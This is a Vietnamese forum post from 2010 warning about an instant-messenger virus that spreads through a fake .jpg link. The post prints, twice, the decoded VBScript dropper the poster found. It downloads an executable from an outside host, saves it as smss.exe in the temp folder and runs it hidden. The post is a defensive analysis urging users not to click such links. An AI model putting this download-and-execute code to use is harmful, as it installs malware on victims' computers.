Virus IM càng ngày càng tinh vi hơn
Trang 1 trong tổng số 1 trang
Virus IM càng ngày càng tinh vi hơn
admin 25/3/2010, 12:11 pm
tôi nhận được 1 link ảnh như sau :
hxxp://my.http.vn/hinhvn/miss_thuy.jpg
View source thấy đoạn code sau :
if(frames)
{if(top.frames.length>0)
top.location.href=self.location;
}
document.write(unescape('%0D%0A%3C%........%2Fb%6Fdy%3E%0D%0A'))
thủ đoạn ở đây là đuôi file : .jpg --> ko ai nghi nghờ cả (Chỉ bị đối với
IE 5.x), cái này có vẻ giống Gaixinh.jpg
hơn nữa đoạn code đã được escape. Sau khi unescape nó sẽ như sau (đoạn được
escape):
on error resume next
dl =
"hxxp://my.http.vn/hinhvn/bt.exe"
Set df =
document.createElement("object")
df.setAttribute "classid",
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x
=
df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set
S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl,
False
x.Send
fname1="smss.exe"
set F =
df.createobject("scripting.FileSystemObject","")
set tmp =
F.GetSpecialFolder(2) ' Get tmp folder
fname1=
F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile
fname1,2
S.close
set Q =
df.createobject("Shell.Application","")
Q.ShellExecute
fname1,"","","open",0
ALIGN="middle" HSPACE="4" VSPACE="2">
Code hoàn toàn giống các con virus cũ, file lây nhiễm
hxxp://my.http.vn/hinhvn/bt.exe chắc là cũng được viết bằng autoit (sẽ zem kỹ
sau-->sau khi xem thấy ko decomplie được, chưa biết thế nào).
Các bạn hãy cảnh giác ko bấm vào bất kỳ link nào send qua IM.
hxxp://my.http.vn/hinhvn/miss_thuy.jpg
View source thấy đoạn code sau :
if(frames)
{if(top.frames.length>0)
top.location.href=self.location;
}
document.write(unescape('%0D%0A%3C%........%2Fb%6Fdy%3E%0D%0A'))
thủ đoạn ở đây là đuôi file : .jpg --> ko ai nghi nghờ cả (Chỉ bị đối với
IE 5.x), cái này có vẻ giống Gaixinh.jpg
hơn nữa đoạn code đã được escape. Sau khi unescape nó sẽ như sau (đoạn được
escape):
on error resume next
dl =
"hxxp://my.http.vn/hinhvn/bt.exe"
Set df =
document.createElement("object")
df.setAttribute "classid",
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x
=
df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set
S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl,
False
x.Send
fname1="smss.exe"
set F =
df.createobject("scripting.FileSystemObject","")
set tmp =
F.GetSpecialFolder(2) ' Get tmp folder
fname1=
F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile
fname1,2
S.close
set Q =
df.createobject("Shell.Application","")
Q.ShellExecute
fname1,"","","open",0
ALIGN="middle" HSPACE="4" VSPACE="2">
Code hoàn toàn giống các con virus cũ, file lây nhiễm
hxxp://my.http.vn/hinhvn/bt.exe chắc là cũng được viết bằng autoit (sẽ zem kỹ
sau-->sau khi xem thấy ko decomplie được, chưa biết thế nào).
Các bạn hãy cảnh giác ko bấm vào bất kỳ link nào send qua IM.
admin- Thiếu Úy III
- Tổng số bài gửi : 627
Diem : 6557
Thank : 4
Join date : 24/03/2010
Đến từ : Bỉm Sơn - Thanh hóa -
Similar topics» Người nhiễm virus máy tính!
» Virus máy tính – Phòng tránh và khắc phục
» Virus máy tính – Phòng tránh và khắc phục
» Quét virus trực tuyến bằng nhiều bộ máy anti-virus
» Lập trình virus trên C - viết virus khóa chuột
» Virus máy tính – Phòng tránh và khắc phục
» Virus máy tính – Phòng tránh và khắc phục
» Quét virus trực tuyến bằng nhiều bộ máy anti-virus
» Lập trình virus trên C - viết virus khóa chuột
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
» xin tai lieu tieng viet
» Theo dõi tiến trình
» Giải pháp Bảo mật của Cisco
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
» Learn to hack !
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
» Ô Long Viên (Tập II)
» những ebook về hack tiếng việt cho người mới tìm hiểu.